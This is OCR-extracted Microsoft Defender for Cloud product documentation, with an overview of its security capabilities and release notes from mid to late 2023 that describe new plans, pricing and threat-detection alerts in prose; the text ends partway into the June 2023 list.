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Microsoft Defender for Cloud 
documentation 


Microsoft Defender for Cloud provides unified security management and advanced 
threat protection across hybrid cloud workloads. 


About Defender for Cloud 


OVERVIEW 

What are the key capabilities of Defender for Cloud? 

Which versions of Windows Server and Linux are supported? 
How do | get started with Defender for Cloud? 


What are security policies, initiatives, and recommendations? 


Stay current 


GA WHAT'S NEW 

Release notes for Defender for Cloud 
Important upcoming changes 
Overview of Defender for DevOps 


Microsoft cloud security benchmark in Defender for Cloud 


Get started 


E GET STARTED 

Enable Defender for Cloud on your subscriptions 
Enable enhanced security features 

Connect hybrid and multicloud machines 


Set up email notifications 


Improve your secure score 


HOW-TO GUIDE 

Understanding secure score 

Remediate security recommendations 
Exempt a resource from a recommendation 


Track your scores over time 


Mitigate threats 


HOW-TO GUIDE 

Manage just-in-time access 

Set up adaptive application controls 
Implement adaptive network hardening 


Use the Workload protections 


Defend multicloud resources 


HOW-TO GUIDE 


Use Defender for Cloud to protect multicloud resources 


DO VIDEO 


Protecting multicloud environments (AWS & GCP) £ 


What is Microsoft Defender for Cloud? 


Article e 07/24/2023 


Microsoft Defender for Cloud is a cloud-native application protection platform (CNAPP) 
with a set of security measures and practices designed to protect cloud-based 
applications from various cyber threats and vulnerabilities. Defender for Cloud combines 
the capabilities of: 


e A development security operations (DevSecOps) solution that unifies security 
management at the code level across multicloud and multiple-pipeline 
environments 

e A cloud security posture management (CSPM) solution that surfaces actions that 
you can take to prevent breaches 

e A cloud workload protection platform (CWPP) with specific protections for servers, 
containers, storage, databases, and other workloads 


Microsoft Defender for Cloud 


Unify your DevOps Strengthen and manage your Protect your cloud 
Security Management cloud security posture workloads 


© 6 @ 
00 


© Note 


For Defender for Cloud pricing information, see the pricing page” . 


Secure cloud applications 


Defender for Cloud helps you to incorporate good security practices early during the 
software development process, or DevSecOps. You can protect your code management 
environments and your code pipelines, and get insights into your development 
environment security posture from a single location. Defender for DevOps, a service 
available in Defender for Cloud, empowers security teams to manage DevOps security 
across multi-pipeline environments. 


Today's applications require security awareness at the code, infrastructure, and runtime 
levels to make sure that deployed applications are hardened against attacks. 


Capability What problem does it solve? Get started Defender 
plan 
Code Empowers security teams with the ability to Connect Azure Defender 
pipeline protect applications and resources from code to DevOps and for 
insights cloud across multi-pipeline environments, GitHub DevOps 
including GitHub and Azure DevOps. Findings repositories to 
from Defender for DevOps, such as laC Defender for 


misconfigurations and exposed secrets, can then Cloud 
be correlated with other contextual cloud security 
insights to prioritize remediation in code. 


Improve your security posture 


The security of your cloud and on-premises resources depends on proper configuration 
and deployment. Defender for Cloud recommendations identify the steps that you can 


take to secure your environment. 


Defender for Cloud includes Foundational CSPM capabilities for free. You can also 
enable advanced CSPM capabilities by enabling the Defender CSPM plan. 


Capability What problem does it solve? Get started Defender 

plan 
Centralized Define the security conditions that you Customize a Foundational 
policy want to maintain across your environment. security policy CSPM (Free) 
management The policy translates to recommendations 


that identify resource configurations that 
violate your security policy. The Microsoft 
cloud security benchmark is a built-in 
standard that applies security principles 
with detailed technical implementation 
guidance for Azure and other cloud 
providers (such as AWS and GCP). 


Secure score Summarize your security posture based on Track your Foundational 
the security recommendations. As you secure score CSPM (Free) 
remediate recommendations, your secure 
score improves. 


Multicloud Connect to your multicloud environments Connect your Foundational 
coverage with agentless methods for CSPM insight Amazon AWS CSPM (Free) 
and CWP protection. and Google 


GCP cloud 


Capability 


What problem does it solve? 


Get started 


resources to 
Defender for 
Cloud 


Defender 
plan 


Cloud Security Use the dashboard to see weaknesses in Enable CSPM Foundational 
Posture your security posture. tools CSPM (Free) 
Management 
(CSPM) 
Advanced Get advanced tools to identify weaknesses Enable CSPM Defender 
Cloud Security in your security posture, including: tools CSPM 
Posture - Governance to drive actions to improve 
Management your security posture 

- Regulatory compliance to verify 

compliance with security standards 

- Cloud security explorer to build a 

comprehensive view of your environment 
Data-aware Data-aware security posture automatically Enable data- Defender 
Security discovers datastores containing sensitive aware security CSPM or 
Posture data, and helps reduce risk of data posture Defender for 

breaches. Storage 
Attack path Model traffic on your network to identify Build queries to Defender 
analysis potential risks before you implement analyze paths CSPM 

changes to your environment. 
Cloud Security A map of your cloud environment that lets Build queries to Defender 
Explorer you build queries to find security risks. find security CSPM 

risks 

Security Drive security improvements through your Define Defender 
governance organization by assigning tasks to resource governance CSPM 

owners and tracking progress in aligning rules 

your security state with your security 

policy. 
Microsoft Entra Provide comprehensive visibility and Review your Defender 
Permissions control over permissions for any identity Permission CSPM 
Management and any resource in Azure, AWS, and GCP. Creep Index 

(CPI) 


Protect cloud workloads 


Proactive security principles require that you implement security practices that protect 
your workloads from threats. Cloud workload protections (CWP) surface workload- 


specific recommendations that lead you to the right security controls to protect your 


workloads. 


When your environment is threatened, security alerts right away indicate the nature and 


severity of the threat so you can plan your response. After you identify a threat in your 


environment, you need to quickly respond to limit the risk to your resources. 


Capability 


Protect cloud 
servers 


Identify threats 
to your storage 
resources 


Protect cloud 
databases 


Protect 
containers 


Infrastructure 
service insights 


What problem does it solve? 


Provide server protections through 
Microsoft Defender for Endpoint or 
extended protection with just-in-time 
network access, file integrity monitoring, 
vulnerability assessment, and more. 


Detect unusual and potentially harmful 
attempts to access or exploit your 
storage accounts using advanced threat 
detection capabilities and Microsoft 
Threat Intelligence data to provide 
contextual security alerts. 


Protect your entire database estate with 
attack detection and threat response for 
the most popular database types in 
Azure to protect the database engines 
and data types, according to their attack 
surface and security risks. 


Secure your containers so you can 
improve, monitor, and maintain the 
security of your clusters, containers, and 
their applications with environment 
hardening, vulnerability assessments, 
and run-time protection. 


Diagnose weaknesses in your application 
infrastructure that can leave your 
environment susceptible to attack. 


Get started 


Secure your 
multicloud and 
on-premises 
servers 


Protect your 
cloud storage 
resources 


Deploy 
specialized 
protections for 
cloud and on- 
premises 
databases 


Find security risks 
in your containers 


- Identify attacks 
targeting 
applications 
running over App 
Service 


Defender 
plan 


Defender for 
Servers 


Defender for 
Storage 


- Defender for 
Azure SQL 
Databases 

- Defender for 
SQL servers 
on machines 

- Defender for 
Open-source 
relational 
databases 

- Defender for 
Azure Cosmos 
DB 


Defender for 
Containers 


- Defender for 
App Service 


- Defender for 
Key Vault 


Capability 


Security alerts 


Security 
incidents 


@ Important 


What problem does it solve? 


Get informed of real-time events that 
threaten the security of your 
environment. Alerts are categorized and 
assigned severity levels to indicate 
proper responses. 


Correlate alerts to identify attack 
patterns and integrate with Security 
Information and Event Management 
(SIEM), Security Orchestration 
Automated Response (SOAR), and IT 
Service Management (ITSM) solutions to 
respond to threats and limit the risk to 
your resources. 


Get started 


- Detect attempts 
to exploit Key 
Vault accounts 

- Get alerted on 
suspicious 
Resource 
Manager 
operations 

- Expose 
anomalous DNS 
activities 


Manage security 
alerts 


Export alerts to 
SIEM, SOAR, or 
ITSM systems 


Defender 
plan 


- Defender for 
Resource 
Manager 


- Defender for 
DNS 


Any workload 
protection 
Defender plan 


Any workload 
protection 
Defender plan 


As of August 1, customers with an existing subscription to Defender for DNS can 


continue to use the service, but new subscribers will receive alerts about suspicious 


DNS activity as part of Defender for Servers P2. 


Learn More 


For more information about Defender for Cloud and how it works, check out: 


e Astep-by-step walkthrough’ of Defender for Cloud 


e An interview about Defender for Cloud with an expert in cybersecurity in Lessons 


Learned from the Field 


e Microsoft Defender for Cloud - Use cases E 


e Microsoft Defender for Cloud PoC Series - Microsoft Defender for Containers E 


Next steps 


Enable Microsoft Defender plans 


What's new in Microsoft Defender for 
Cloud? 


Article e 10/18/2023 


Defender for Cloud is in active development and receives improvements on an ongoing 
basis. To stay up to date with the most recent developments, this page provides you 
with information about new features, bug fixes, and deprecated functionality. 


This page is updated frequently with the latest updates in Defender for Cloud. 


Q Tip 


Get notified when this page is updated by copying and pasting the following URL 
into your feed reader: 


https://aka.ms/mdc/rss 
To learn about planned changes that are coming soon to Defender for Cloud, see 
Important upcoming changes to Microsoft Defender for Cloud. 


If you're looking for items older than six months, you can find them in the Archive for 
What's new in Microsoft Defender for Cloud. 


October 2023 


Date Update 
October Releasing CIS Azure Foundations Benchmark v2.0.0 in Regulatory Compliance 
18 dashboard 


Releasing CIS Azure Foundations Benchmark v2.0.0 in 
regulatory compliance dashboard 


October 18, 2023 


Microsoft Defender for Cloud now supports the latest CIS Azure Security Foundations 
Benchmark - version 2.0.0 Z in the Regulatory Compliance dashboard “, as well as a 
built-in policy initiative in Azure Policy. The release of version 2.0.0 in Microsoft 
Defender for Cloud is a joint collaborative effort between Microsoft, the Center for 
Internet Security (CIS), and the user communities. The version 2.0.0 significantly expands 


assessment scope which now includes 90+ built-in Azure policies and will succeed the 


prior versions 1.4.0 and 1.3.0 and 1.0 in Microsoft Defender for Cloud and Azure Policy. 


Please refer to this blog post’ for more details. 


September 2023 


Date 


September 
27 


September 
21 


September 
20 


September 
11 


September 
11 


September 
6 


September 
6 


September 
5 


September 
1 


Update 


Data security dashboard available in public preview 


Preview release: New autoprovisioning process for SQL Server on machines plan 


GitHub Advanced Security for Azure DevOps alerts in Defender for Cloud 


Exempt functionality now available for Defender for APIs recommendations 


Create sample alerts for Defender for APIs detections 


Preview release: Containers vulnerability assessment powered by Microsoft 


Defender Vulnerability Management now supports scan on pull 


Updated naming format of Center for Internet Security (CIS) standards in 
regulatory compliance 


Sensitive data discovery for PaaS databases (Preview) 


General Availability (GA): malware scanning in Defender for Storage 


Data security dashboard available in public preview 


September 27, 2023 


The data security dashboard is now available in public preview as part of the Defender 


CSPM plan. The data security dashboard is an interactive, data-centric dashboard that 


illuminates significant risks to sensitive data, prioritizing alerts and potential attack paths 


for data across hybrid cloud workloads. Learn more about the data security dashboard. 


Preview release: New autoprovisioning process for SQL 
Server on machines plan 


September 21, 2023 


Microsoft Monitoring Agent (MMA) is being deprecated in August 2024. Defender for 
Cloud updated it's strategy by replacing MMA with the release of a SQL Server-targeted 
Azure Monitoring Agent autoprovisioning process. 


During the preview, customers who are using the MMA autoprovisioning process with 
Azure Monitor Agent (Preview) option, are requested to migrate to the new Azure 
Monitoring Agent for SQL server on machines (Preview) autoprovisioning process. The 
migration process is seamless and provides continuous protection for all machines. 


For more information, see Migrate to SQL server-targeted Azure Monitoring Agent 
autoprovisioning process. 


GitHub Advanced Security for Azure DevOps alerts in 
Defender for Cloud 


September 20, 2023 


You can now view GitHub Advanced Security for Azure DevOps (GHAzDO) alerts related 
to CodeQL, secrets, and dependencies in Defender for Cloud. Results will be displayed in 
the DevOps blade and in Recommendations. To see these results, onboard your 
GHAzDO-enabled repositories to Defender for Cloud. 


Learn more about GitHub Advanced Security for Azure DevOps Z. 


Exempt functionality now available for Defender for APIs 
recommendations 


September 11, 2023 


You can now exempt recommendations for the following Defender for APIs security 
recommendations. 


Recommendation Description & related policy Severity 
(Preview) API endpoints As a security best practice, API endpoints that haven't Low 
that are unused should received traffic for 30 days are considered unused, and 

be disabled and removed should be removed from the Azure API Management 

from the Azure API service. Keeping unused API endpoints might pose a 

Management service security risk. These might be APIs that should have been 


deprecated from the Azure API Management service, but 
have accidentally been left active. Such APIs typically do 
not receive the most up-to-date security coverage. 


Recommendation Description & related policy Severity 


(Preview) API endpoints API endpoints published within Azure API Management High 

in Azure API should enforce authentication to help minimize security 

Management should be risk. Authentication mechanisms are sometimes 

authenticated implemented incorrectly or are missing. This allows 
attackers to exploit implementation flaws and to access 
data. For APIs published in Azure API Management, this 
recommendation assesses the execution of authentication 
via the Subscription Keys, JWT, and Client Certificate 
configured within Azure API Management. If none of these 
authentication mechanisms are executed during the API 
call, the API will receive this recommendation. 


Learn more about exempting recommendations in Defender for Cloud. 


Create sample alerts for Defender for APIs detections 
September 11, 2023 


You can now generate sample alerts for the security detections that were released as 
part of the Defender for APIs public preview. Learn more about generating sample alerts 
in Defender for Cloud. 


Preview release: containers vulnerability assessment 
powered by Microsoft Defender Vulnerability 
Management now supports scan on pull 


September 6, 2023 


Containers vulnerability assessment powered by Microsoft Defender Vulnerability 
Management (MDVM), now supports an additional trigger for scanning images pulled 
from an ACR. This newly added trigger provides additional coverage for active images in 
addition to the existing triggers scanning images pushed to an ACR in the last 90 days 
and images currently running in AKS. 


The new trigger will start rolling out today, and is expected to be available to all 
customers by end of September. 


For more information, see Container Vulnerability Assessment powered by MDVM 


Updated naming format of Center for Internet Security 
(CIS) standards in regulatory compliance 


September 6, 2023 


The naming format of CIS (Center for Internet Security) foundations benchmarks in the 
compliance dashboard is changed from [Cloud] CIS [version number] to CIS [Cloud] 


Foundations v[version number]. Refer to the following table: 


Current Name New Name 

Azure CIS 1.1.0 CIS Azure Foundations v1.1.0 
Azure CIS 1.3.0 CIS Azure Foundations v1.3.0 
Azure CIS 1.4.0 CIS Azure Foundations v1.4.0 
AWS CIS 1.2.0 CIS AWS Foundations v1.2.0 
AWS CIS 1.5.0 CIS AWS Foundations v1.5.0 
GCP CIS 1.1.0 CIS GCP Foundations v1.1.0 
GCP CIS 1.2.0 CIS GCP Foundations v1.2.0 


Learn how to improve your regulatory compliance. 


Sensitive data discovery for PaaS databases (Preview) 


September 5, 2023 


Data-aware security posture capabilities for frictionless sensitive data discovery for PaaS 
Databases (Azure SQL Databases and Amazon RDS Instances of any type) are now in 
public preview. This public preview allows you to create a map of your critical data 
wherever it resides, and the type of data that is found in those databases. 


Sensitive data discovery for Azure and AWS databases, adds to the shared taxonomy 
and configuration, which is already publicly available for cloud object storage resources 
(Azure Blob Storage, AWS S3 buckets and GCP storage buckets) and provides a single 


configuration and enablement experience. 


Databases are scanned on a weekly basis. If you enable sensitive data discovery, 


discovery runs within 24 hours. The results can be viewed in the Cloud Security Explorer 
or by reviewing the new attack paths for managed databases with sensitive data. 


Data-aware security posture for databases is available through the Defender CSPM plan, 
and is automatically enabled on subscriptions where sensitive data discovery option is 


enabled. 


You can learn more about data aware security posture in the following articles: 


e Support and prerequisites for data-aware security posture 
e Enable data-aware security posture 

e Explore risks to sensitive data 

e Azure data attack paths 

e AWS data attack paths 


General Availability (GA): malware scanning in Defender 
for Storage 


September 1, 2023 


Malware scanning is now generally available (GA) as an add-on to Defender for Storage. 
Malware scanning in Defender for Storage helps protect your storage accounts from 
malicious content by performing a full malware scan on uploaded content in near real 
time, using Microsoft Defender Antivirus capabilities. It's designed to help fulfill security 
and compliance requirements for handling untrusted content. The malware scanning 
capability is an agentless SaaS solution that allows setup at scale, and supports 
automating response at scale. 


Learn more about malware scanning in Defender for Storage. 


Malware scanning is priced according to your data usage and budget. Billing begins on 
September 3, 2023. Visit the pricing page Z for more information. 


If you're using the previous plan (now renamed "Microsoft Defender for Storage 
(classic)"), you need to proactively migrate to the new plan in order to enable malware 


scanning. 


Read the Microsoft Defender for Cloud announcement blog post”. 


August 2023 


Updates in August include: 


Date Update 


August Defender For Containers: Agentless Discovery for Kubernetes 
30 


August Recommendation release: Microsoft Defender for Storage should be enabled with 
22 malware scanning and sensitive data threat detection 


Date Update 


August Extended properties in Defender for Cloud security alerts are masked from activity 
17 logs 


August Preview release of GCP support in Defender CSPM 


August New security alerts in Defender for Servers Plan 2: Detecting potential attacks abusing 
7 Azure virtual machine extensions 


August Business model and pricing updates for Defender for Cloud plans 


Defender For Containers: Agentless discovery for 
Kubernetes 


August 30, 2023 


We're excited to introduce to Defender For Containers: Agentless discovery for 
Kubernetes. This release marks a significant step forward in container security, 
empowering you with advanced insights and comprehensive inventory capabilities for 
Kubernetes environments. The new container offering is powered by the Defender for 
Cloud contextual security graph. Here's what you can expect from this latest update: 


e Agentless Kubernetes discovery 

e Comprehensive inventory capabilities 

e Kubernetes-specific security insights 

e Enhanced risk hunting with Cloud Security Explorer 


Agentless discovery for Kubernetes is now available to all Defender For Containers 
customers. You can start using these advanced capabilities today. We encourage you to 
update your subscriptions to have the full set of extensions enabled, and benefit from 
the latest additions and features. Visit the Environment and settings pane of your 
Defender for Containers subscription to enable the extension. 


O Note 


Enabling the latest additions won't incur new costs to active Defender for 


Containers customers. 


For more information, see Agentless discovery for Kubernetes. 


Recommendation release: Microsoft Defender for Storage 
should be enabled with malware scanning and sensitive 
data threat detection 


August 22, 2023 


A new recommendation in Defender for Storage has been released. This 
recommendation ensures that Defender for Storage is enabled at the subscription level 
with malware scanning and sensitive data threat detection capabilities. 


Recommendation Description 

Microsoft Defender for Microsoft Defender for Storage detects potential threats to your 
Storage should be storage accounts. It helps prevent the three major impacts on your 
enabled with malware data and workload: malicious file uploads, sensitive data exfiltration, 
scanning and sensitive and data corruption. The new Defender for Storage plan includes 
data threat detection malware scanning and sensitive data threat detection. This plan also 


provides a predictable pricing structure (per storage account) for 
control over coverage and costs. With a simple agentless setup at 
scale, when enabled at the subscription level, all existing and newly 
created storage accounts under that subscription will be 
automatically protected. You can also exclude specific storage 
accounts from protected subscriptions. 


This new recommendation replaces the current recommendation Microsoft Defender 
for Storage should be enabled (assessment key 1be22853-8ed1-4005-9907- 
ddad64cb1417). However, this recommendation will still be available in Azure 


Government clouds. 


Learn more about Microsoft Defender for Storage. 


Extended properties in Defender for Cloud security alerts 
are masked from activity logs 


August 17, 2023 


We recently changed the way security alerts and activity logs are integrated. To better 
protect sensitive customer information, we no longer include this information in activity 
logs. Instead, we mask it with asterisks. However, this information is still available 
through the alerts API, continuous export, and the Defender for Cloud portal. 


Customers who rely on activity logs to export alerts to their SIEM solutions should 
consider using a different solution, as it isn't the recommended method for exporting 


Defender for Cloud security alerts. 


For instructions on how to export Defender for Cloud security alerts to SIEM, SOAR and 
other third party applications, see Stream alerts to a SIEM, SOAR, or IT Service 
Management solution. 


Preview release of GCP support in Defender CSPM 


August 15, 2023 


We're announcing the preview release of the Defender CSPM contextual cloud security 
graph and attack path analysis with support for GCP resources. You can apply the power 
of Defender CSPM for comprehensive visibility and intelligent cloud security across GCP 


resources. 
Key features of our GCP support include: 


e Attack path analysis - Understand the potential routes attackers might take. 

e Cloud security explorer - Proactively identify security risks by running graph-based 
queries on the security graph. 

e Agentless scanning - Scan servers and identify secrets and vulnerabilities without 
installing an agent. 

e Data-aware security posture - Discover and remediate risks to sensitive data in 
Google Cloud Storage buckets. 


Learn more about Defender CSPM plan options. 


New security alerts in Defender for Servers Plan 2: 
Detecting potential attacks abusing Azure virtual machine 
extensions 


August 7, 2023 


This new series of alerts focuses on detecting suspicious activities of Azure virtual 
machine extensions and provides insights into attackers' attempts to compromise and 
perform malicious activities on your virtual machines. 


Microsoft Defender for Servers can now detect suspicious activity of the virtual machine 
extensions, allowing you to get better coverage of the workloads security. 


Azure virtual machine extensions are small applications that run post-deployment on 
virtual machines and provide capabilities such as configuration, automation, monitoring, 
security, and more. While extensions are a powerful tool, they can be used by threat 


actors for various malicious intents, for example: 


Data collection and monitoring 


Encrypting disks 


Here's a table of the new alerts. 


Alert (alert type) 


Suspicious failure installing GPU extension 
in your subscription (Preview) 
(VM_GPUExtensionSuspiciousFailure) 


Suspicious installation of a GPU extension 
was detected on your virtual machine 
(Preview) 
(VM_GPUDriverExtensionUnusualExecution) 
This alert was released in July 2023. 


Code execution and configuration deployment with high privileges 
Resetting credentials and creating administrative users 


Description MITRE tactics 


Suspicious intent of Impact 
installing a GPU 
extension on 
unsupported VMs. 
This extension 
should be installed 
on virtual machines 
equipped with a 
graphic processor, 
and in this case the 
virtual machines 
aren't equipped with 
such. These failures 
can be seen when 
malicious adversaries 
execute multiple 
installations of such 
extension for crypto- 
mining purposes. 


Suspicious Impact 
installation of a GPU 
extension was 
detected on your 
virtual machine by 
analyzing the Azure 
Resource Manager 
operations in your 
subscription. 
Attackers may use 
the GPU driver 
extension to install 
GPU drivers on your 
virtual machine via 
the Azure Resource 
Manager to perform 
cryptojacking. This 
activity is deemed 
suspicious as the 
principal's behavior 


Severity 


Medium 


Low 


Alert (alert type) Description MITRE tactics Severity 


departs from its 
usual patterns. 


Run Command with a suspicious script was A Run Command Execution High 

detected on your virtual machine (Preview) with a suspicious 

(VM_RunCommandSuspiciousScript) script was detected 
on your virtual 
machine by 
analyzing the Azure 
Resource Manager 
operations in your 
subscription. 
Attackers may use 
Run Command to 
execute malicious 
code with high 
privileges on your 
virtual machine via 
the Azure Resource 
Manager. The script 
is deemed suspicious 
as certain parts were 
identified as being 
potentially malicious. 


Suspicious unauthorized Run Command Suspicious Execution Medium 
usage was detected on your virtual unauthorized usage 

machine (Preview) of Run Command 
(VM_RunCommandSuspiciousFailure) has failed and was 


detected on your 
virtual machine by 
analyzing the Azure 
Resource Manager 
operations in your 
subscription. 
Attackers may 
attempt to use Run 
Command to 
execute malicious 
code with high 
privileges on your 
virtual machines via 
the Azure Resource 
Manager. This 
activity is deemed 
suspicious as it 
hasn't been 


Alert (alert type) 


Suspicious Run Command usage was 


detected on your virtual machine (Preview) 


(VM_RunCommandSuspiciousUsage) 


Suspicious usage of multiple monitoring or 
data collection extensions was detected on 


your virtual machines (Preview) 
(VM_SuspiciousMultiExtensionUsage) 


Description MITRE tactics 


commonly seen 
before. 


Suspicious usage of Execution 
Run Command was 
detected on your 
virtual machine by 
analyzing the Azure 
Resource Manager 
operations in your 
subscription. 
Attackers may use 
Run Command to 
execute malicious 
code with high 
privileges on your 
virtual machines via 
the Azure Resource 
Manager. This 
activity is deemed 
suspicious as it 
hasn't been 
commonly seen 
before. 


Suspicious usage of Reconnaissance 
multiple monitoring 
or data collection 
extensions was 
detected on your 
virtual machines by 
analyzing the Azure 
Resource Manager 
operations in your 
subscription. 
Attackers may abuse 
such extensions for 
data collection, 
network traffic 
monitoring, and 
more, in your 
subscription. This 
usage is deemed 
suspicious as it 
hasn't been 
commonly seen 
before. 


Severity 


Low 


Medium 


Alert (alert type) Description MITRE tactics Severity 


Suspicious installation of disk encryption Suspicious Impact Medium 
extensions was detected on your virtual installation of disk 

machines (Preview) encryption 

(VM_DiskEncryptionSuspiciousUsage) extensions was 


detected on your 
virtual machines by 
analyzing the Azure 
Resource Manager 
operations in your 
subscription. 
Attackers may abuse 
the disk encryption 
extension to deploy 
full disk encryptions 
on your virtual 
machines via the 
Azure Resource 
Manager in an 
attempt to perform 
ransomware activity. 
This activity is 
deemed suspicious 
as it hasn't been 
commonly seen 
before and due to 
the high number of 


extension 
installations. 
Suspicious usage of VM Access extension Suspicious usage of Persistence Medium 
was detected on your virtual machines VM Access extension 
(Preview) was detected on 
(VM_VMAccessSuspiciousUsage) your virtual 


machines. Attackers 
may abuse the VM 
Access extension to 
gain access and 
compromise your 
virtual machines with 
high privileges by 
resetting access or 
managing 
administrative users. 
This activity is 
deemed suspicious 
as the principal's 
behavior departs 


Alert (alert type) Description MITRE tactics Severity 


from its usual 
patterns, and due to 
the high number of 
the extension 


installations. 
Desired State Configuration (DSC) Desired State Execution High 
extension with a suspicious script was Configuration (DSC) 


detected on your virtual machine (Preview) extension with a 

(VM_DSCExtensionSuspiciousScript) suspicious script was 
detected on your 
virtual machine by 
analyzing the Azure 
Resource Manager 
operations in your 
subscription. 
Attackers may use 
the Desired State 
Configuration (DSC) 
extension to deploy 
malicious 
configurations, such 
as persistence 
mechanisms, 
malicious scripts, 
and more, with high 
privileges, on your 
virtual machines. The 
script is deemed 
suspicious as certain 
parts were identified 
as being potentially 


malicious. 
Suspicious usage of a Desired State Suspicious usage of Impact Low 
Configuration (DSC) extension was a Desired State 
detected on your virtual machines Configuration (DSC) 
(Preview) extension was 
(VM_DSCExtensionSuspiciousUsage) detected on your 


virtual machines by 
analyzing the Azure 
Resource Manager 
operations in your 
subscription. 
Attackers may use 
the Desired State 
Configuration (DSC) 
extension to deploy 


Alert (alert type) Description MITRE tactics Severity 


malicious 
configurations, such 
as persistence 
mechanisms, 
malicious scripts, 
and more, with high 
privileges, on your 
virtual machines. 
This activity is 
deemed suspicious 
as the principal's 
behavior departs 
from its usual 
patterns, and due to 
the high number of 
the extension 


installations. 
Custom script extension with a suspicious Custom script Execution High 
script was detected on your virtual extension with a 
machine (Preview) suspicious script was 
(VM_CustomScriptExtensionSuspiciousCmd) detected on your 
(This alert already exists and has been virtual machine by 
improved with more enhanced logic and analyzing the Azure 
detection methods.) Resource Manager 


operations in your 
subscription. 
Attackers may use 
Custom script 
extension to execute 
malicious code with 
high privileges on 
your virtual machine 
via the Azure 
Resource Manager. 
The script is deemed 
suspicious as certain 
parts were identified 
as being potentially 
malicious. 


See the extension-based alerts in Defender for Servers. 


For a complete list of alerts, see the reference table for all security alerts in Microsoft 
Defender for Cloud. 


Business model and pricing updates for Defender for 
Cloud plans 


August 1, 2023 

Microsoft Defender for Cloud has three plans that offer service layer protection: 
e Defender for Key Vault 
e Defender for Resource Manager 
e Defender for DNS 


These plans have transitioned to a new business model with different pricing and 
packaging to address customer feedback regarding spending predictability and 
simplifying the overall cost structure. 


Business model and pricing changes summary: 


Existing customers of Defender for Key-Vault, Defender for Resource Manager, and 
Defender for DNS keep their current business model and pricing unless they actively 
choose to switch to the new business model and price. 


e Defender for Resource Manager: This plan has a fixed price per subscription per 
month. Customers can switch to the new business model by selecting the Defender 
for Resource Manager new per-subscription model. 


Existing customers of Defender for Key-Vault, Defender for Resource Manager, and 
Defender for DNS keep their current business model and pricing unless they actively 
choose to switch to the new business model and price. 


e Defender for Resource Manager: This plan has a fixed price per subscription per 
month. Customers can switch to the new business model by selecting the Defender 
for Resource Manager new per-subscription model. 

e Defender for Key Vault: This plan has a fixed price per vault, per month with no 
overage charge. Customers can switch to the new business model by selecting the 
Defender for Key Vault new per-vault model 

e Defender for DNS: Defender for Servers Plan 2 customers gain access to Defender 
for DNS value as part of Defender for Servers Plan 2 at no extra cost. Customers 
that have both Defender for Server Plan 2 and Defender for DNS are no longer 
charged for Defender for DNS. Defender for DNS is no longer available as a 
standalone plan. 


Learn more about the pricing for these plans in the Defender for Cloud pricing page Z. 


July 2023 


Updates in July include: 


Date Update 


July Preview release of containers Vulnerability Assessment powered by Microsoft Defender 
31 Vulnerability Management (MDVM) in Defender for Containers and Defender for 
Container Registries 


July Agentless container posture in Defender CSPM is now Generally Available 
30 


July Management of automatic updates to Defender for Endpoint for Linux 
20 


July Agentless secret scanning for virtual machines in Defender for servers P2 & Defender 
18 CSPM 


July New Security alert in Defender for Servers plan 2: Detecting Potential Attacks leveraging 
12 Azure VM GPU driver extensions 


July9 Support for disabling specific vulnerability findings 


July 1 Data Aware Security Posture is now Generally Available 


Preview release of containers Vulnerability Assessment 
powered by Microsoft Defender Vulnerability 
Management (MDVM) in Defender for Containers and 
Defender for Container Registries 


July 31, 2023 


We're announcing the release of Vulnerability Assessment (VA) for Linux container 
images in Azure container registries powered by Microsoft Defender Vulnerability 
Management (MDVM) in Defender for Containers and Defender for Container Registries. 
The new container VA offering will be provided alongside our existing Container VA 
offering powered by Qualys in both Defender for Containers and Defender for Container 
Registries, and include daily rescans of container images, exploitability information, 
support for OS and programming languages (SCA) and more. 


This new offering will start rolling out today, and is expected to be available to all 


customers by August 7. 


For more information, see Container Vulnerability Assessment powered by MDVM and 
Microsoft Defender Vulnerability Management (MDVM). 


Agentless container posture in Defender CSPM is now 
Generally Available 


July 30, 2023 


Agentless container posture capabilities is now Generally Available (GA) as part of the 
Defender CSPM (Cloud Security Posture Management) plan. 


Learn more about agentless container posture in Defender CSPM. 


Management of automatic updates to Defender for 
Endpoint for Linux 


July 20, 2023 


By default, Defender for Cloud attempts to update your Defender for Endpoint for Linux 
agents onboarded with the MDE.Linux extension. With this release, you can manage this 
setting and opt-out from the default configuration to manage your update cycles 
manually. 


Learn how to manage automatic updates configuration for Linux. 


Agentless secret scanning for virtual machines in 
Defender for servers P2 & Defender CSPM 


July 18, 2023 


Secret scanning is now available as part of the agentless scanning in Defender for 
Servers P2 and Defender CSPM. This capability helps to detect unmanaged and insecure 
secrets saved on virtual machines, both in Azure or AWS resources, that can be used to 
move laterally in the network. If secrets are detected, Defender for Cloud can help to 
prioritize and take actionable remediation steps to minimize the risk of lateral 


movement, all without affecting your machine's performance. 


For more information about how to protect your secrets with secret scanning, see 
Manage secrets with agentless secret scanning. 


New security alert in Defender for Servers plan 2: 
detecting potential attacks leveraging Azure VM GPU 
driver extensions 


July 12, 2023 


This alert focuses on identifying suspicious activities leveraging Azure virtual machine 
GPU driver extensions and provides insights into attackers’ attempts to compromise 
your virtual machines. The alert targets suspicious deployments of GPU driver 
extensions; such extensions are often abused by threat actors to utilize the full power of 
the GPU card and perform cryptojacking. 


Alert Display Name Description Severity MITRE 
(Alert Type) Tactic 
Suspicious installation of GPU extension in Suspicious installation of a Low Impact 
your virtual machine (Preview) GPU extension was detected 
(VM_GPUDriverExtensionUnusualExecution) in your virtual machine by 


analyzing the Azure Resource 
Manager operations in your 
subscription. Attackers may 
use the GPU driver extension 
to install GPU drivers on your 
virtual machine via the Azure 
Resource Manager to 
perform cryptojacking. 


For a complete list of alerts, see the reference table for all security alerts in Microsoft 
Defender for Cloud. 


Support for disabling specific vulnerability findings 
July 9, 2023 


Release of support for disabling vulnerability findings for your container registry images 
or running images as part of agentless container posture. If you have an organizational 
need to ignore a vulnerability finding on your container registry image, rather than 
remediate it, you can optionally disable it. Disabled findings don't affect your secure 
score or generate unwanted noise. 


Learn how to disable vulnerability assessment findings on Container registry images. 


Data Aware Security Posture is now Generally Available 


July 1, 2023 


Data-aware security posture in Microsoft Defender for Cloud is now Generally Available. 


It helps customers to reduce data risk, and respond to data breaches. Using data-aware 


security posture you can: 


e Automatically discover sensitive data resources across Azure and AWS. 


e Evaluate data sensitivity, data exposure, and how data flows across the 


organization. 


e Proactively and continuously uncover risks that might lead to data breaches. 


e Detect suspicious activities that might indicate ongoing threats to sensitive data 


resources 


For more information, see Data-aware security posture in Microsoft Defender for Cloud. 


June 2023 


Updates in June include: 


Date 


June 
26 


June 
25 


June 
15 


June 
11 


June 7 


June 6 


June 4 


Update 


Streamlined multicloud account onboarding with enhanced settings 


Private Endpoint support for Malware Scanning in Defender for Storage 


